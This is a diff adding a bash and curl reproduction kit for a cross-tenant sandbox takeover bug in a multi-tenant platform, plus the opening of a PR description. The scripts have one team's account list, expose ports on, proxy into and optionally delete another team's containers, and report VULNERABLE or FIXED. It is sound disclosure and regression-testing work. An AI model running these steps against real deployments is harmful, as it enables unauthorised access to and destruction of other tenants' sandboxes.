+echo "  ./02-attacker-login.sh"

--- a/tests/security/cross-tenant-sandbox/02-attacker-login.sh
+++ b/tests/security/cross-tenant-sandbox/02-attacker-login.sh
@@ -1,0 +1,32 @@
+#!/usr/bin/env bash
+# 02 — Log in as the attacker (Team A).
+# Saves the CLI access token to .state/attacker.json.
+set -euo pipefail
+# shellcheck source=_lib.sh
+source "$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)/_lib.sh"
+
+banner "02  Login as attacker (Team A)"
+require_var ATTACKER_EMAIL
+require_var ATTACKER_PASSWORD
+
+login attacker "${ATTACKER_EMAIL}" "${ATTACKER_PASSWORD}" "${ATTACKER_ORG:-}" "${ATTACKER_TEAM:-}"
+
+victim_file="${STATE_DIR}/victim.json"
+if [[ -f "${victim_file}" ]]; then
+  v_org="$(jq -r '.org.slug // empty' "${victim_file}")"
+  v_team="$(jq -r '.team // empty' "${victim_file}")"
+  a_org="$(jq -r '.org.slug // empty' "${STATE_DIR}/attacker.json")"
+  a_team="$(jq -r '.team // empty' "${STATE_DIR}/attacker.json")"
+  echo
+  echo "  victim   org=${v_org}  team=${v_team:-"(jwt default)"}"
+  echo "  attacker org=${a_org}  team=${a_team:-"(jwt default)"}"
+  if [[ -n "${v_team}" && -n "${a_team}" && "${v_team}" == "${a_team}" && "${v_org}" == "${a_org}" ]]; then
+    echo
+    echo "WARNING: attacker and victim resolved to the SAME org+team."
+    echo "This repro is only meaningful across two different teams."
+    echo "Set VICTIM_TEAM / ATTACKER_TEAM in .env to distinct slugs."
+  fi
+fi
+
+echo
+echo "Next: ./03-victim-list-containers.sh"

--- a/tests/security/cross-tenant-sandbox/03-victim-list-containers.sh
+++ b/tests/security/cross-tenant-sandbox/03-victim-list-containers.sh
@@ -1,0 +1,56 @@
+#!/usr/bin/env bash
+# 03 — Victim lists their own containers (baseline).
+# Picks the first running (else first) container and stores its name.
+set -euo pipefail
+# shellcheck source=_lib.sh
+source "$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)/_lib.sh"
+
+banner "03  Victim lists own containers (baseline)"
+require_state victim.json
+
+body="$(api victim GET /api/sandbox/containers)"
+print_http
+echo "${body}" | jq .
+echo "${body}" > "${STATE_DIR}/victim-containers.json"
+
+http="$(last_http)"
+if [[ "${http}" != "200" ]]; then
+  echo
+  echo "ERROR: victim could not list containers (HTTP ${http})." >&2
+  echo >&2
+  if echo "${body}" | grep -qi 'Incus is not installed'; then
+    echo "This is the Incus-only handler on a non-Incus host." >&2
+    echo "GET /api/sandbox/containers calls sandboxConnect() → Incus." >&2
+    echo "On Kubernetes/OpenShell it returns 503 BEFORE NewSessionRegistry()" >&2
+    echo "and before any tenant check. The reported takeover path cannot" >&2
+    echo "run on this deployment." >&2
+    echo >&2
+    echo "Run ./00-check-backend.sh (after 01) for status/details." >&2
+    echo "See README.md section \"Kubernetes / OpenShell hosts\"." >&2
+  else
+    echo "Is sandbox enabled? Unexpected error body is above." >&2
+  fi
+  exit 1
+fi
+
+# Prefer a running container; fall back to the first listed one.
+container="$(echo "${body}" | jq -r '
+  (.containers // [])
+  | (map(select(.status == "running")) + .)
+  | .[0].name // empty
+')"
+
+if [[ -z "${container}" ]]; then
+  echo
+  echo "ERROR: victim has no sandbox containers." >&2
+  echo "Log into Studio as ${VICTIM_EMAIL}, start a chat/session that" >&2
+  echo "creates a sandbox, wait until it is running, then re-run this script." >&2
+  exit 1
+fi
+
+echo "${container}" > "${STATE_DIR}/victim-container-name"
+echo
+echo "  recorded victim container: ${container}"
+echo "  saved: ${STATE_DIR}/victim-container-name"
+echo
+echo "Next: ./04-attacker-list-containers.sh"

--- a/tests/security/cross-tenant-sandbox/04-attacker-list-containers.sh
+++ b/tests/security/cross-tenant-sandbox/04-attacker-list-containers.sh
@@ -1,0 +1,45 @@
+#!/usr/bin/env bash
+# 04 — Attacker lists containers. THIS IS THE FIRST PROOF.
+# Vulnerable: the victim's container appears in the attacker's list.
+# Fixed:      the victim's container is absent.
+set -euo pipefail
+# shellcheck source=_lib.sh
+source "$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)/_lib.sh"
+
+banner "04  Attacker lists containers (cross-tenant leak?)"
+require_state attacker.json
+require_state victim-container-name
+
+victim_container="$(cat "${STATE_DIR}/victim-container-name")"
+
+body="$(api attacker GET /api/sandbox/containers)"
+print_http
+echo "${body}" | jq .
+echo "${body}" > "${STATE_DIR}/attacker-containers.json"
+
+http="$(last_http)"
+if [[ "${http}" != "200" ]]; then
+  verdict INCONCLUSIVE "attacker list failed with HTTP ${http} (expected 200)"
+  exit 1
+fi
+
+found="$(echo "${body}" | jq -r --arg n "${victim_container}" '
+  (.containers // []) | map(select(.name == $n)) | length
+')"
+
+echo
+echo "  looking for victim container: ${victim_container}"
+echo "  matches in attacker list:     ${found}"
+
+if [[ "${found}" != "0" ]]; then
+  verdict VULNERABLE "GET /api/sandbox/containers returned Team B container ${victim_container} to a Team A user"
+  echo
+  echo "Next: ./05-attacker-list-exposed-ports.sh"
+  exit 0
+fi
+
+verdict FIXED "attacker list did not include victim container ${victim_container}"
+echo
+echo "If the rest of the chain is also fixed, later steps should 404."
+echo "You can still run them to confirm:"
+echo "  ./05-attacker-list-exposed-ports.sh"

--- a/tests/security/cross-tenant-sandbox/05-attacker-list-exposed-ports.sh
+++ b/tests/security/cross-tenant-sandbox/05-attacker-list-exposed-ports.sh
@@ -1,0 +1,39 @@
+#!/usr/bin/env bash
+# 05 — Attacker lists exposed ports on the victim's container.
+# Vulnerable: 200 with the victim's port list.
+# Fixed:      404 (container not in the attacker's tenant-scoped registry).
+set -euo pipefail
+# shellcheck source=_lib.sh
+source "$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)/_lib.sh"
+
+banner "05  Attacker lists victim exposed ports"
+require_state attacker.json
+require_state victim-container-name
+
+victim_container="$(cat "${STATE_DIR}/victim-container-name")"
+path="/api/sandbox/containers/${victim_container}/expose"
+
+body="$(api attacker GET "${path}")"
+print_http
+echo "${body}" | jq . 2>/dev/null || echo "${body}"
+echo "${body}" > "${STATE_DIR}/attacker-list-ports.json"
+
+http="$(last_http)"
+echo
+echo "  GET ${path}"
+
+case "${http}" in
+  200)
+    verdict VULNERABLE "attacker read exposed ports on ${victim_container} (HTTP 200)"
+    ;;
+  404)
+    verdict FIXED "attacker could not see victim container ports (HTTP 404)"
+    ;;
+  *)
+    verdict INCONCLUSIVE "unexpected HTTP ${http} listing victim ports"
+    exit 1
+    ;;
+esac
+
+echo
+echo "Next: ./06-attacker-expose-port.sh"

--- a/tests/security/cross-tenant-sandbox/06-attacker-expose-port.sh
+++ b/tests/security/cross-tenant-sandbox/06-attacker-expose-port.sh
@@ -1,0 +1,42 @@
+#!/usr/bin/env bash
+# 06 — Attacker exposes EXPOSE_PORT on the victim's container.
+# Vulnerable: 200 {"status":"ok",...}
+# Fixed:      404
+set -euo pipefail
+# shellcheck source=_lib.sh
+source "$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)/_lib.sh"
+
+banner "06  Attacker exposes port ${EXPOSE_PORT} on victim container"
+require_state attacker.json
+require_state victim-container-name
+
+victim_container="$(cat "${STATE_DIR}/victim-container-name")"
+path="/api/sandbox/containers/${victim_container}/expose"
+
+body="$(api attacker POST "${path}" -d "$(jq -n --argjson p "${EXPOSE_PORT}" '{port: $p}')")"
+print_http
+echo "${body}" | jq . 2>/dev/null || echo "${body}"
+echo "${body}" > "${STATE_DIR}/attacker-expose.json"
+
+http="$(last_http)"
+echo
+echo "  POST ${path}  {\"port\": ${EXPOSE_PORT}}"
+
+case "${http}" in
+  200)
+    verdict VULNERABLE "attacker exposed port ${EXPOSE_PORT} on ${victim_container}"
+    echo "${EXPOSE_PORT}" > "${STATE_DIR}/exposed-port"
+    ;;
+  404)
+    verdict FIXED "attacker could not expose a port on victim container (HTTP 404)"
+    echo "${EXPOSE_PORT}" > "${STATE_DIR}/exposed-port"
+    ;;
+  *)
+    verdict INCONCLUSIVE "unexpected HTTP ${http} exposing port on victim container"
+    echo "${EXPOSE_PORT}" > "${STATE_DIR}/exposed-port"
+    exit 1
+    ;;
+esac
+
+echo
+echo "Next: ./07-attacker-proxy.sh"

--- a/tests/security/cross-tenant-sandbox/07-attacker-proxy.sh
+++ b/tests/security/cross-tenant-sandbox/07-attacker-proxy.sh
@@ -1,0 +1,53 @@
+#!/usr/bin/env bash
+# 07 — Attacker proxies HTTP into the victim's container.
+# Vulnerable: anything other than 403/404 (often 200, 502 if nothing listens).
+# Fixed:      403 (port not exposed in attacker's registry) or 404.
+#
+# A 502 here is STILL a finding: the handler reached the victim container
+# and tried to dial it. Only 403/404 mean the ownership check held.
+set -euo pipefail
+# shellcheck source=_lib.sh
+source "$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)/_lib.sh"
+
+banner "07  Attacker proxies into victim container"
+require_state attacker.json
+require_state victim-container-name
+
+victim_container="$(cat "${STATE_DIR}/victim-container-name")"
+port="${EXPOSE_PORT}"
+if [[ -f "${STATE_DIR}/exposed-port" ]]; then
+  port="$(cat "${STATE_DIR}/exposed-port")"
+fi
+path="/api/sandbox/proxy/${victim_container}/${port}/"
+
+body="$(api attacker GET "${path}")"
+print_http
+# Proxy responses may not be JSON.
+echo "${body}" | head -c 2000
+echo
+echo "${body}" > "${STATE_DIR}/attacker-proxy.body"
+
+http="$(last_http)"
+echo
+echo "  GET ${path}"
+
+case "${http}" in
+  403|404)
+    verdict FIXED "proxy refused cross-tenant access (HTTP ${http})"
+    ;;
+  200)
+    verdict VULNERABLE "attacker received HTTP 200 from inside victim container ${victim_container}:${port}"
+    ;;
+  502|504)
+    verdict VULNERABLE "proxy reached victim container ${victim_container}:${port} (HTTP ${http} — dial/upstream failed, but no ownership check)"
+    ;;
+  *)
+    verdict INCONCLUSIVE "unexpected HTTP ${http} on proxy; inspect .state/attacker-proxy.body"
+    exit 1
+    ;;
+esac
+
+echo
+echo "Optional destructive proof:"
+echo "  ./08-attacker-delete-container.sh"
+echo "Skip 08 unless you are willing to destroy the victim sandbox."

--- a/tests/security/cross-tenant-sandbox/08-attacker-delete-container.sh
+++ b/tests/security/cross-tenant-sandbox/08-attacker-delete-container.sh
@@ -1,0 +1,49 @@
+#!/usr/bin/env bash
+# 08 — DESTRUCTIVE. Attacker deletes the victim's container.
+# Vulnerable: 200 {"status":"ok"}
+# Fixed:      404
+#
+# Only run this if you are willing to destroy the victim sandbox.
+set -euo pipefail
+# shellcheck source=_lib.sh
+source "$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)/_lib.sh"
+
+banner "08  Attacker DELETES victim container (destructive)"
+require_state attacker.json
+require_state victim-container-name
+
+victim_container="$(cat "${STATE_DIR}/victim-container-name")"
+
+if [[ "${CONFIRM_DESTROY:-}" != "yes" ]]; then
+  echo "Refusing to delete ${victim_container} without confirmation."
+  echo
+  echo "Re-run with:"
+  echo "  CONFIRM_DESTROY=yes ./08-attacker-delete-container.sh"
+  exit 1
+fi
+
+path="/api/sandbox/containers/${victim_container}"
+body="$(api attacker DELETE "${path}")"
+print_http
+echo "${body}" | jq . 2>/dev/null || echo "${body}"
+echo "${body}" > "${STATE_DIR}/attacker-delete.json"
+
+http="$(last_http)"
+echo
+echo "  DELETE ${path}"
+
+case "${http}" in
+  200)
+    verdict VULNERABLE "attacker deleted victim container ${victim_container}"
+    ;;
+  404)
+    verdict FIXED "attacker could not delete victim container (HTTP 404)"
+    ;;
+  *)
+    verdict INCONCLUSIVE "unexpected HTTP ${http} deleting victim container"
+    exit 1
+    ;;
+esac
+
+echo
+echo "Done. Review .state/verdicts.log for the full chain."

--- a/tests/security/cross-tenant-sandbox/09-cleanup.sh
+++ b/tests/security/cross-tenant-sandbox/09-cleanup.sh
@@ -1,0 +1,25 @@
+#!/usr/bin/env bash
+# Optional cleanup. Unexpose the port the attacker opened (as the victim),
+# then wipe local tokens. Does NOT delete the container unless you also ran 08.
+set -euo pipefail
+# shellcheck source=_lib.sh
+source "$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)/_lib.sh"
+
+banner "09  Cleanup"
+
+if [[ -f "${STATE_DIR}/victim.json" && -f "${STATE_DIR}/victim-container-name" && -f "${STATE_DIR}/exposed-port" ]]; then
+  container="$(cat "${STATE_DIR}/victim-container-name")"
+  port="$(cat "${STATE_DIR}/exposed-port")"
+  echo "→ victim unexposing ${container} port ${port}"
+  body="$(api victim DELETE "/api/sandbox/containers/${container}/expose/${port}" || true)"
+  print_http
+  echo "${body}" | jq . 2>/dev/null || echo "${body}"
+else
+  echo "  skip unexpose (no recorded container/port)"
+fi
+
+echo
+echo "→ removing local tokens and response dumps in ${STATE_DIR}"
+rm -rf "${STATE_DIR}"
+mkdir -p "${STATE_DIR}"
+echo "  done. .env is left in place."

--- a/tests/security/cross-tenant-sandbox/README.md
+++ b/tests/security/cross-tenant-sandbox/README.md
@@ -1,0 +1,255 @@
+# Cross-tenant sandbox takeover — reproduction kit
+
+Private repro for the report against SAP/astonish (commit
+`41f5b7b7589c276c61e2cef1e9450cf054a062bc` and current `main`).
+
+**Do not run this against production.** Point `BASE_URL` at a dedicated
+dev/staging platform. Keep `.env` out of git.
+
+Target used while writing this kit (Incus platform):
+
+```
+https://astonish.local.muxpie.com
+```
+
+## What the bug is
+
+On a multi-tenant (PostgreSQL) deployment, several sandbox management
+handlers look up sessions with `sandbox.NewSessionRegistry()` — the
+single-tenant personal-mode store — instead of
+`buildPGSessionRegistry(r.Context())`, which scopes the lookup to the
+caller's org/team.
+
+Affected handlers (all sit behind normal session auth; any valid account
+is enough):
+
+| Handler | Route | File |
+|---|---|---|
+| `SandboxContainerListHandler` | `GET /api/sandbox/containers` | `pkg/api/sandbox_handlers.go` |
+| `SandboxContainerDeleteHandler` | `DELETE /api/sandbox/containers/{id}` | same |
+| `SandboxListExposedPortsHandler` | `GET /api/sandbox/containers/{id}/expose` | same |
+| `SandboxExposePortHandler` | `POST /api/sandbox/containers/{id}/expose` | same |
+| `SandboxUnexposePortHandler` | `DELETE /api/sandbox/containers/{id}/expose/{port}` | same |
+| `SandboxPinContainerHandler` | `POST /api/sandbox/containers/{id}/pin` | same |
+| `SandboxProxyHandler` | `GET /api/sandbox/proxy/{container}/{port}/...` | `pkg/api/sandbox_proxy.go` |
+
+The correct, tenant-aware path already exists in
+`pkg/api/sandbox_backend.go` (`buildPGSessionRegistry`) and is used by
+team-template handlers. These container-management handlers never call it.
+
+Personal / SQLite mode is **not** in scope: there is only one tenant.
+
+## What you need
+
+- `curl`, `jq`, `python3`, `bash`
+- A **platform-mode** (PostgreSQL) Astonish server with sandbox enabled
+- Two ordinary accounts in **different teams** of the same org (or
+  different orgs — either is a finding)
+  - **Victim (Team B)** — will own a running sandbox
+  - **Attacker (Team A)** — must **not** be a member of Team B; no admin
+    role required
+- The victim must have at least one sandbox container before step 03.
+  Easiest: log into Studio as the victim, start a chat that uses a
+  sandbox, wait until it is running.
+- **Incus backend.** The reported handlers talk to Incus (`sandboxConnect()`).
+  On Kubernetes they 503 before the tenant bug is reachable. Run
+  `./00-check-backend.sh` after login. See “Kubernetes / OpenShell hosts”.
+
+## One-time setup
+
+```bash
+cd tests/security/cross-tenant-sandbox
+cp env.example .env
+# edit .env — emails, passwords, optional team slugs
+chmod +x *.sh
+```
+
+`.env` fields:
+
+| Variable | Required | Meaning |
+|---|---|---|
+| `BASE_URL` | yes | Platform URL, no trailing slash |
+| `VICTIM_EMAIL` / `VICTIM_PASSWORD` | yes | Team B account |
+| `ATTACKER_EMAIL` / `ATTACKER_PASSWORD` | yes | Team A account |
+| `VICTIM_TEAM` / `ATTACKER_TEAM` | if multi-team | Force `X-Astonish-Team` |
+| `VICTIM_ORG` / `ATTACKER_ORG` | if multi-org | Passed to `/api/auth/login` |
+| `EXPOSE_PORT` | no (default 8080) | Port the attacker tries to open |
+
+Auth uses `client_type=cli` so the JWT comes back in the JSON body
+(`access_token`) and subsequent calls send `Authorization: Bearer …`.
+That matches `pkg/client.LoginWithPassword` and skips cookie/CSRF.
+
+## Run the chain
+
+Scripts are numbered and share state under `.state/`. Run them in order.
+Each one prints `Next: ./0N-….sh`.
+
+```bash
+cd tests/security/cross-tenant-sandbox
+
+./01-victim-login.sh
+./00-check-backend.sh            # confirms Incus vs K8s vs OpenShell
+# If backend is Incus: start a sandbox as the victim in Studio, then:
+./02-attacker-login.sh
+./03-victim-list-containers.sh   # records .state/victim-container-name
+./04-attacker-list-containers.sh # FIRST PROOF
+./05-attacker-list-exposed-ports.sh
+./06-attacker-expose-port.sh
+./07-attacker-proxy.sh
+
+# optional, DESTRUCTIVE — destroys the victim sandbox:
+CONFIRM_DESTROY=yes ./08-attacker-delete-container.sh
+
+./09-cleanup.sh                  # unexpose (as victim) + wipe .state/
+```
+
+Or, non-destructive run in one shot (stops before delete):
+
+```bash
+./01-victim-login.sh && \
+./02-attacker-login.sh && \
+./03-victim-list-containers.sh && \
+./04-attacker-list-containers.sh && \
+./05-attacker-list-exposed-ports.sh && \
+./06-attacker-expose-port.sh && \
+./07-attacker-proxy.sh
+```
+
+Re-run the same sequence after a fix. Compare `.state/verdicts.log`.
+
+## How to read a verdict
+
+Every proof script appends a line to `.state/verdicts.log`:
+
+```
+<utc-iso>  VULNERABLE|FIXED|INCONCLUSIVE  <reason>
+```
+
+and prints `VERDICT: …` on stdout.
+
+| Step | Vulnerable | Fixed |
+|---|---|---|
+| 04 list | victim container **is** in the attacker's `containers[]` | it is **absent** |
+| 05 ports | HTTP **200** | HTTP **404** |
+| 06 expose | HTTP **200** `status=ok` | HTTP **404** |
+| 07 proxy | HTTP **200** (or **502/504** — the handler dialed the victim box) | HTTP **403** or **404** |
+| 08 delete | HTTP **200** `status=ok` | HTTP **404** |
+
+Step 04 alone is enough to confirm the issue. 05–07 show the blast
+radius (read ports, open a port, proxy traffic in). 08 is the
+destructive proof; skip it unless you can recreate the victim sandbox.
+
+A **502** on step 07 is still a finding: `SandboxProxyHandler` already
+passed `IsPortExposed` and tried to dial the container. Nothing listening
+inside does not make the access check succeed.
+
+## Kubernetes / OpenShell hosts
+
+K8s/OpenShell platforms (for example a previous
+`https://astonish.eu-de-2.cloud.sap` cluster) **cannot simulate the
+reported takeover** through these scripts. The Incus host
+`https://astonish.local.muxpie.com` can.
+
+Every handler in the report starts with `sandboxConnect()`:
+
+```go
+func sandboxConnect() (*incus.IncusClient, error) {
+    platform, reason := incus.DetectPlatformReason()
+    if platform == incus.PlatformUnsupported {
+        return nil, fmt.Errorf("sandbox unavailable: %s", reason)
+    }
+    // ...
+}
+```
+
+`DetectPlatformReason()` looks for a local Incus socket. On Kubernetes
+it returns “Incus is not installed” and the handler responds **HTTP 503
+before `NewSessionRegistry()` runs**. There is no tenant lookup, so
+there is nothing to leak or take over via `/api/sandbox/containers`.
+
+K8s session pods are created through `sandboxBackendForRequest` →
+`buildPGSessionRegistry(r.Context())`, which **is** team-scoped. Chat
+session list/delete (`/api/studio/sessions`) also goes through the
+tenant-scoped store. Those are a different surface from this report.
+
+What you *can* capture on K8s as evidence:
+
+```bash
+./01-victim-login.sh
+./00-check-backend.sh            # backend=k8s, platform=kubernetes
+./03-victim-list-containers.sh   # HTTP 503, Incus is not installed
+```
+
+That 503 is the correct outcome on K8s. To exercise 04–08 use the
+Incus host (`https://astonish.local.muxpie.com`) with two teams.
+
+## State files
+
+All local artifacts live in `.state/` (gitignored):
+
+| File | Written by | Contents |
+|---|---|---|
+| `victim.json` / `attacker.json` | 01 / 02 | CLI tokens + user/org/team |
+| `victim-containers.json` | 03 | victim's list response |
+| `victim-container-name` | 03 | chosen container id |
+| `attacker-containers.json` | 04 | attacker's list response |
+| `attacker-list-ports.json` | 05 | |
+| `attacker-expose.json` | 06 | |
+| `exposed-port` | 06 | port number used |
+| `attacker-proxy.body` | 07 | raw proxy body |
+| `attacker-delete.json` | 08 | |
+| `verdicts.log` | 04–08 | timestamped verdicts |
+
+`./09-cleanup.sh` deletes `.state/` after attempting to unexpose the
+port **as the victim**. It does not delete the container.
+
+## Manual equivalent (if you prefer curl)
+
+Login (CLI tokens in the body):
+
+```bash
+curl -sS -X POST "$BASE_URL/api/auth/login" \
+  -H "Content-Type: application/json" \
+  -d '{"email":"...","password":"...","client_type":"cli"}'
+```
+
+Then:
+
+```bash
+# 03 / 04
+curl -sS -H "Authorization: Bearer $TOKEN" \
+  -H "X-Astonish-Team: $TEAM" \
+  "$BASE_URL/api/sandbox/containers"
+
+# 05
+curl -sS -H "Authorization: Bearer $TOKEN" \
+  "$BASE_URL/api/sandbox/containers/$ID/expose"
+
+# 06
+curl -sS -X POST -H "Authorization: Bearer $TOKEN" \
+  -H "Content-Type: application/json" \
+  -d '{"port":8080}' \
+  "$BASE_URL/api/sandbox/containers/$ID/expose"
+
+# 07
+curl -sS -H "Authorization: Bearer $TOKEN" \
+  "$BASE_URL/api/sandbox/proxy/$ID/8080/"
+
+# 08
+curl -sS -X DELETE -H "Authorization: Bearer $TOKEN" \
+  "$BASE_URL/api/sandbox/containers/$ID"
+```
+
+## Expected code-level fix (not applied here)
+
+Route the listed handlers through `buildPGSessionRegistry(r.Context())`
+(or an equivalent tenant check) and only fall back to
+`sandbox.NewSessionRegistry()` in genuine single-tenant deployments —
+the same pattern `sandboxBackendForRequest` already uses.
+
+## Safety
+
+- Scripts talk only to `BASE_URL` from `.env`.
+- Step 08 requires `CONFIRM_DESTROY=yes`.
+- `.env` and `.state/` are gitignored.
+- Tokens are JWTs for two test accounts; treat `.state/*.json` as secrets.

--- a/tests/security/cross-tenant-sandbox/_lib.sh
+++ b/tests/security/cross-tenant-sandbox/_lib.sh
@@ -1,0 +1,226 @@
+#!/usr/bin/env bash
+# Shared helpers for the cross-tenant sandbox repro.
+# Sourced by every numbered script. Do not run this file directly.
+
+set -euo pipefail
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+STATE_DIR="${SCRIPT_DIR}/.state"
+ENV_FILE="${SCRIPT_DIR}/.env"
+
+mkdir -p "${STATE_DIR}"
+
+need_cmd() {
+  command -v "$1" >/dev/null 2>&1 || {
+    echo "ERROR: required command '$1' is not installed." >&2
+    exit 1
+  }
+}
+
+need_cmd curl
+need_cmd jq
+need_cmd python3
+
+if [[ ! -f "${ENV_FILE}" ]]; then
+  echo "ERROR: ${ENV_FILE} is missing." >&2
+  echo "Copy env.example and fill in the two accounts:" >&2
+  echo "  cp env.example .env" >&2
+  exit 1
+fi
+
+# shellcheck disable=SC1090
+set -a
+source "${ENV_FILE}"
+set +a
+
+BASE_URL="${BASE_URL%/}"
+EXPOSE_PORT="${EXPOSE_PORT:-8080}"
+
+if [[ -z "${BASE_URL}" ]]; then
+  echo "ERROR: BASE_URL is empty in .env" >&2
+  exit 1
+fi
+
+require_var() {
+  local name="$1"
+  if [[ -z "${!name:-}" ]]; then
+    echo "ERROR: ${name} is empty in .env" >&2
+    exit 1
+  fi
+}
+
+json_get() {
+  # json_get <file> <jq-filter>
+  jq -er "$2" "$1"
+}
+
+save_json() {
+  # save_json <path>  — reads stdin
+  python3 -c 'import json,sys; json.dump(json.load(sys.stdin), open(sys.argv[1],"w"), indent=2)' "$1"
+}
+
+login() {
+  # login <role> <email> <password> [org] [team]
+  # Writes ${STATE_DIR}/${role}.json with access_token, user, org, team.
+  local role="$1"
+  local email="$2"
+  local password="$3"
+  local org="${4:-}"
+  local team="${5:-}"
+  local out="${STATE_DIR}/${role}.json"
+  local body
+
+  body="$(jq -n \
+    --arg email "${email}" \
+    --arg password "${password}" \
+    --arg org "${org}" \
+    --arg team "${team}" \
+    '{
+      email: $email,
+      password: $password,
+      client_type: "cli"
+    }
+    + (if $org  != "" then {org:  $org}  else {} end)
+    + (if $team != "" then {team: $team} else {} end)')"
+
+  echo "→ logging in as ${role} (${email}) at ${BASE_URL}"
+  local resp http_code
+  resp="$(mktemp)"
+  http_code="$(
+    curl -sS -o "${resp}" -w "%{http_code}" \
+      -X POST "${BASE_URL}/api/auth/login" \
+      -H "Content-Type: application/json" \
+      -d "${body}"
+  )"
+
+  if [[ "${http_code}" != "200" ]]; then
+    echo "ERROR: login failed for ${role} (HTTP ${http_code})" >&2
+    cat "${resp}" >&2
+    echo >&2
+    rm -f "${resp}"
+    exit 1
+  fi
+
+  if ! jq -e '.access_token' "${resp}" >/dev/null; then
+    echo "ERROR: login response for ${role} has no access_token." >&2
+    echo "The server must honour client_type=cli (tokens in the JSON body)." >&2
+    cat "${resp}" >&2
+    echo >&2
+    rm -f "${resp}"
+    exit 1
+  fi
+
+  jq '{
+    access_token: .access_token,
+    refresh_token: .refresh_token,
+    user: .user,
+    org: .org,
+    team: (.team // ""),
+    available_orgs: (.available_orgs // []),
+    available_teams: (.available_teams // [])
+  }' "${resp}" > "${out}"
+  rm -f "${resp}"
+
+  echo "  user  : $(jq -r '.user.email' "${out}")  id=$(jq -r '.user.id' "${out}")  role=$(jq -r '.user.role' "${out}")"
+  echo "  org   : $(jq -r '.org.slug' "${out}")"
+  echo "  team  : $(jq -r '.team // "(jwt default)"' "${out}")"
+  echo "  saved : ${out}"
+}
+
+token_for() {
+  local role="$1"
+  local file="${STATE_DIR}/${role}.json"
+  if [[ ! -f "${file}" ]]; then
+    echo "ERROR: ${file} not found. Run the login script for ${role} first." >&2
+    exit 1
+  fi
+  jq -er '.access_token' "${file}"
+}
+
+team_for() {
+  local role="$1"
+  local override="$2"
+  if [[ -n "${override}" ]]; then
+    echo "${override}"
+    return
+  fi
+  local file="${STATE_DIR}/${role}.json"
+  if [[ -f "${file}" ]]; then
+    jq -r '.team // empty' "${file}"
+    return
+  fi
+  echo ""
+}
+
+api() {
+  # api <role> <method> <path> [curl extra args...]
+  # Prints the response body. HTTP status is written to ${STATE_DIR}/last_http_code.
+  local role="$1"
+  local method="$2"
+  local path="$3"
+  shift 3
+  local token team header_team
+  token="$(token_for "${role}")"
+  case "${role}" in
+    victim)   team="$(team_for victim   "${VICTIM_TEAM:-}")" ;;
+    attacker) team="$(team_for attacker "${ATTACKER_TEAM:-}")" ;;
+    *)        team="" ;;
+  esac
+
+  header_team=()
+  if [[ -n "${team}" ]]; then
+    header_team=(-H "X-Astonish-Team: ${team}")
+  fi
+
+  local resp
+  resp="$(mktemp)"
+  local http_code
+  http_code="$(
+    curl -sS -o "${resp}" -w "%{http_code}" \
+      -X "${method}" \
+      "${BASE_URL}${path}" \
+      -H "Authorization: Bearer ${token}" \
+      -H "Content-Type: application/json" \
+      -H "X-Requested-With: XMLHttpRequest" \
+      "${header_team[@]}" \
+      "$@"
+  )"
+  echo "${http_code}" > "${STATE_DIR}/last_http_code"
+  cat "${resp}"
+  rm -f "${resp}"
+}
+
+last_http() {
+  cat "${STATE_DIR}/last_http_code" 2>/dev/null || echo "000"
+}
+
+print_http() {
+  echo "  HTTP $(last_http)"
+}
+
+require_state() {
+  local name="$1"
+  if [[ ! -f "${STATE_DIR}/${name}" ]]; then
+    echo "ERROR: missing ${STATE_DIR}/${name}." >&2
+    echo "Run the earlier numbered scripts in order." >&2
+    exit 1
+  fi
+}
+
+banner() {
+  echo
+  echo "================================================================"
+  echo " $1"
+  echo "================================================================"
+}
+
+verdict() {
+  # verdict VULNERABLE|FIXED|INCONCLUSIVE "reason"
+  local status="$1"
+  local reason="$2"
+  mkdir -p "${STATE_DIR}"
+  printf '%s\t%s\t%s\n' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "${status}" "${reason}" >> "${STATE_DIR}/verdicts.log"
+  echo
+  echo "VERDICT: ${status}"
+  echo "  ${reason}"
+}

--- a/tests/security/cross-tenant-sandbox/env.example
+++ b/tests/security/cross-tenant-sandbox/env.example
@@ -1,0 +1,29 @@
+# Copy this file to .env and fill in real values.
+#   cp env.example .env
+# Never commit .env — it holds passwords.
+
+# Platform URL (no trailing slash)
+BASE_URL=https://astonish.local.muxpie.com
+
+# --- Victim (Team B) ----------------------------------------------------------
+# This user owns the sandbox that the attacker will try to take over.
+# Start a Studio chat (or any sandbox session) as this user FIRST so a
+# container exists before you run 03-victim-list-containers.sh.
+VICTIM_EMAIL=
+VICTIM_PASSWORD=
+# Optional: force a team slug if the account belongs to more than one team.
+# Leave empty to use the JWT default team.
+VICTIM_TEAM=
+# Optional: force an org slug during login.
+VICTIM_ORG=
+
+# --- Attacker (Team A) --------------------------------------------------------
+# A normal account on a DIFFERENT team from the victim. Must not be a member
+# of the victim's team. Role can be a regular member — no admin needed.
+ATTACKER_EMAIL=
+ATTACKER_PASSWORD=
+ATTACKER_TEAM=
+ATTACKER_ORG=
+
+# Port the attacker will try to expose on the victim's container (step 06).
+EXPOSE_PORT=8080


### PR DESCRIPTION
# Fix cross-tenant sandbox container isolation (Incus)

## Summary

A logged-in user from one team could **view and take over another team's sandbox container** on Incus deployments. This PR confirms the vulnerability with a rerunnable reproduction kit and fixes it by making both the **read** side (sandbox HTTP handlers) and the **write** side (Incus container creation) use the **team-scoped platform session registry** instead of the legacy, unscoped, pod-local JSON registry.

- **Severity:** High — cross-tenant information disclosure + destructive takeover (list / expose / proxy / delete another team's container).
- **Affected deployments:** Incus-backed daemons in platform mode (which is every daemon; see below). Kubernetes/OpenShell were **not** exploitable via this path (the handlers 503 in `sandboxConnect()` before reaching the bug).

## The vulnerability

Sandbox container-management HTTP handlers built their session registry via the unscoped `sandbox.NewSessionRegistry()` — the personal/file-based registry. On a multi-tenant deployment that registry observes **every team's** sandbox sessions, so `List()`, `ResolveSessionID()`, `GetByContainerName()`, and `Get()` happily resolved container IDs belonging to other teams.

Concretely, an authenticated Team A user could:

1. `GET /api/sandbox/containers` and see **Team B's** containers.
